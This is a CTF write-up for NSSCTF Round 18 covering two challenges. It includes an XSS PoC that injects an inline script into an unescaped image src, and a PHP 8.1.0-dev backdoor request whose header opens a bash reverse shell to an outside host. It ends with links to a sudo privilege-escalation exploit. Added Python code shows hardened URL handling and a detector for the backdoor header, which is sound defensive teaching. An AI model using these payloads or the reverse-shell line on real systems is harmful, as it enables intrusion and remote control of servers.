NSSCTF Round 18 Basic

What does Men-chan (门酱) want to play?

Right-click to view the page source and we find nssctfroundSpring.php:

<?php
highlight_file(__FILE__);
// Partial key code
$contentLines = explode(" ", $comment['content']);
if (preg_match('/^https?:\/\/\S+$/', $contentLines[0])) {
    if (preg_match('/^https?:\/\/[^\/]+\/\S+\.png$/', $contentLines[0], $matches) && end($contentLines) === '/png') {
        $urlParts = parse_url($matches[0]);
        if ($urlParts !== false) {
            echo '<img class="content" src="' . $matches[0] . '">';
            //.......
        }
        //......
    }
    //......
}

There is an obvious XSS here: the matched URL is echoed straight into the src attribute without any escaping, and \S happily matches quotes and angle brackets.
From the comment section we learn that Men-chan has to be made to visit the URL of the 元梦之星 official site, and the comment-posting page is exactly where the code above runs. So we use the XSS, but we still have to get past the CSP:
Content-Security-Policy: script-src 'self' 'unsafe-inline';
Since 'unsafe-inline' is allowed, an inline script can simply set window.location.
Construct the PoC:
https://"><script>window.location="https://ymzx.qq.com/"</script>.png /png
This yields: http://node2.anna.nssctf.cn:28764/words/?title=MQ==&content=aHR0cHMlM0ElMkYlMkYlMjIlM0UlM0NzY3JpcHQlM0V3aW5kb3cubG9jYXRpb24lM0QlMjJodHRwcyUzQSUyRiUyRnltengucXEuY29tJTJGJTIyJTNDJTJGc2NyaXB0JTNFLnBuZyUyMCUyRnBuZw==
Submit it to Men-chan and we get the flag.
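To make the root cause concrete from the defender's side, here is an added example (mine, not code from the challenge or the writeup author) that re-implements the page's PHP check in Python and places a hardened version beside it. It feeds both the page's own PoC string and a constructed benign comment (the host example.com and path are assumptions) through each renderer, showing that the regex chain and parse_url() never reject the payload, while structural validation plus attribute escaping does.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# The page's PoC, reused unchanged as the malicious input.
SAMPLE_PAYLOAD = 'https://"><script>window.location="https://ymzx.qq.com/"</script>.png /png'
# Constructed benign comment; example.com and the path are assumptions.
SAMPLE_BENIGN = 'https://example.com/images/pic.png /png'

# Same two patterns as the PHP code: \S matches anything that is not whitespace,
# including the double quote and angle brackets the payload relies on.
FIRST_RE = re.compile(r'^https?://\S+$')
PNG_RE = re.compile(r'^https?://[^/]+/\S+\.png$')


def render_vulnerable(content: str) -> Optional[str]:
    """Faithful re-implementation of the page's check: regex-validate, parse,
    then echo the raw match into an attribute without escaping."""
    lines = content.split(" ")
    first = lines[0]
    if not FIRST_RE.match(first):
        return None
    m = PNG_RE.match(first)
    if not (m and lines[-1] == "/png"):
        return None
    # parse_url() in PHP only returns false for badly malformed URLs; Python's
    # urlsplit() is just as lenient, so the payload passes through unchanged.
    urlsplit(m.group(0))
    return f'<img class="content" src="{m.group(0)}">'


def render_hardened(content: str) -> Optional[str]:
    """Hardened variant: validate the parsed components with a strict character
    policy, rebuild the URL from those components, and escape on output."""
    lines = content.split(" ")
    first = lines[0]
    if lines[-1] != "/png":
        return None
    parts = urlsplit(first)
    if parts.scheme not in ("http", "https"):
        return None
    # Host (optionally with port) must be a plain DNS-style name: no userinfo,
    # no quotes, no tags.
    if not re.fullmatch(r'[A-Za-z0-9.-]+(:\d{1,5})?', parts.netloc):
        return None
    # Path must be a .png path built only from URL-safe characters.
    if not re.fullmatch(r'(/[A-Za-z0-9._~-]+)+\.png', parts.path):
        return None
    if parts.query or parts.fragment:
        return None
    # Reassemble from validated parts instead of echoing the user's bytes.
    safe_url = f"{parts.scheme}://{parts.netloc}{parts.path}"
    # Escape for the HTML attribute context regardless of validation.
    return f'<img class="content" src="{html.escape(safe_url, quote=True)}">'


def contains_script_tag(rendered: Optional[str]) -> bool:
    """Helper used to show whether a rendered tag carries injected markup."""
    return rendered is not None and "<script>" in rendered


if __name__ == "__main__":
    for label, content in (("payload", SAMPLE_PAYLOAD), ("benign", SAMPLE_BENIGN)):
        print(label, "vulnerable:", render_vulnerable(content))
        print(label, "hardened:  ", render_hardened(content))
```

Escaping fixes the injection in the template; the CSP on the page is the second layer that failed, since script-src 'self' 'unsafe-inline' still executes any inline script that lands in the document. Replacing 'unsafe-inline' with a per-response nonce (or hash) would have stopped this PoC even with the echo bug in place.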

Becomeroot

PHP 8.1.0-dev backdoor vulnerability

GET / HTTP/1.1
Host: node1.anna.nssctf.cn:28073
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/vps/port 0>&1'");
Connection: close
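The request above is a very distinctive artifact: a non-standard User-Agentt header whose value contains the string zerodium, which the backdoored 8.1.0-dev build evaluates as PHP. As an added example (my code, not part of the writeup), here is a small detector that parses raw HTTP/1.1 requests and classifies them. The sample requests are constructed; example.test is a placeholder host and the header values are harmless PHP expressions.

```python
from typing import Dict, List, Optional, Tuple

# Constructed sample traffic modelled on the request shown above.
# example.test is a placeholder host; the header values are harmless.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n"
    "Connection: close\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n"
    "User-Agentt: zerodiumphpinfo();\r\nConnection: close\r\n\r\n",
    "POST /login HTTP/1.1\r\nHost: example.test\r\n"
    "user-agentt: ZeroDiumecho 1;\r\nContent-Length: 0\r\n\r\n",
]

# Trigger marker the backdoor looks for in the header value (a plain,
# case-sensitive substring search in the backdoored build).
TRIGGER_MARKER = "zerodium"


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Split a raw HTTP/1.1 request into a map of lowercase header name to
    the list of values seen (a header may legitimately repeat)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def classify(raw: str) -> Optional[str]:
    """Return 'backdoor-trigger' when a User-Agentt header carries the marker,
    'suspicious-header' when the non-standard header is present without it,
    and None for ordinary traffic. Header names are matched case-insensitively
    because the server normalises them; the marker is matched case-sensitively
    to mirror the backdoor's own check."""
    values = parse_headers(raw).get("user-agentt")
    if not values:
        return None
    if any(TRIGGER_MARKER in v for v in values):
        return "backdoor-trigger"
    return "suspicious-header"


def scan(requests: List[str]) -> List[Tuple[int, str]]:
    """Run classify() over a batch and return (index, verdict) for hits only."""
    findings = []
    for i, raw in enumerate(requests):
        verdict = classify(raw)
        if verdict is not None:
            findings.append((i, verdict))
    return findings


if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_REQUESTS):
        print(f"request {idx}: {verdict}")
```

Flagging the bare header as well as the full trigger is deliberate: User-Agentt appears in no legitimate client, so its presence alone is a useful low-noise indicator, and it catches probes that vary the marker's case. On the host side the sensible check is simply whether any deployed PHP reports itself as 8.1.0-dev, since that build should never be in service.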

Use a tool to scan for privilege-escalation vulnerabilities:
https://github.com/The-Z-Labs/linux-exploit-suggester
Escalate privileges with CVE-2021-3156:
https://github.com/Rvn0xsy/CVE-2021-3156-plus?tab=readme-ov-file
